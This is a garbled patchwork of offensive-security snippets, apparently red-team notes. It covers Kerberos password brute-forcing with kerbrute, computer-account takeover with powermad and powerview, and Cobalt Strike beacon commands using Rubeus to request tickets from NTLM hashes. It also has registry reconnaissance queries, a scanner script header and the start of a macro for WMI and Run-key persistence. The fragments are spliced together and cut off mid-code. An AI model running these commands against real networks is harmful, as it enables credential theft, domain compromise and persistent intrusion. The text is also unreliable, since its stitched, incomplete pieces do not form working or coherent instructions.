With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>
With Rubeus version with brute module:
# import the necessary toolsets
Import-Module .\powermad.ps1
Import-Module .\powerview.ps1
# we are TESTLAB\attacker, who has GenericWrite rights over the primary$ computer account
whoami
# the target computer object we're taking over
$TargetComputer = "primary.testlab.local"
#
# Demonstrate how to queue tasks to execute with each checkin...
#
#
# yield tells a function to pause and return a value. The next time the same instance of the
# function is called, it will resume after where it last yielded.
#
sub stuffToDo {
# Tasks for first checkin
# Before first PowerShell usage you might have to adapt the policies
# Get-ExecutionPolicy -List
# Set-ExecutionPolicy Unrestricted -Scope CurrentUser
# --------------------------------------------------------------------------------
# This setup is only necessary once
# Insert the password into the empty string below and run script
# powershell creates a text file with the encrypted credentials (Windows Data Protection API)
# then the watchdog accesses it...
#$secureStringPwd = "test" | ConvertTo-SecureString -AsPlainText -Force
##### IF ELEVATED:
# grab a TGT b64 blob with a valid NTLM/rc4 (or /aes256:X)
beacon> execute-assembly /home/specter/Rubeus.exe asktgt /user:USER /rc4:NTLM_HASH
# decode the base64 blob to a binary .kirbi
$ base64 -d ticket.b64 > ticket.kirbi
# sacrificial logon session (to prevent the TGT from overwriting your current logon session's TGT)
beacon> make_token DOMAIN\USER PassWordDoesntMatter
Windows version:
reg query x64 HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion
Users who have authed to the system:
ls C:\Users\
System env variables:
reg query x64 HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment
Saved outbound RDP connections:
#openssl req -new -x509 -keyout server.pem -out server.pem -days 365 -nodes
import BaseHTTPServer, SimpleHTTPServer, logging
import ssl
import sys
import cgi
class GetHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):
def do_GET(self):
#logging.error(self.headers)
#!/usr/bin/python
#
# import masscan output and run an nmap scan on the results
#
import sys
import argparse
from libnmap.parser import NmapParser, NmapParserException
from libnmap.process import NmapProcess
'
' SYNOPSIS:
' This macro implements two windows persistence methods:
' - WMI Event Filter object creation
' - simple HKCU Registry Run value insertion. It has to be HKCU to make it work under Win10 x64
'
' WMI Persistence method as originally presented by SEADADDY malware
' (https://github.com/pan-unit42/iocs/blob/master/seaduke/decompiled.py#L887)
' and further documented by Matt Graeber.
'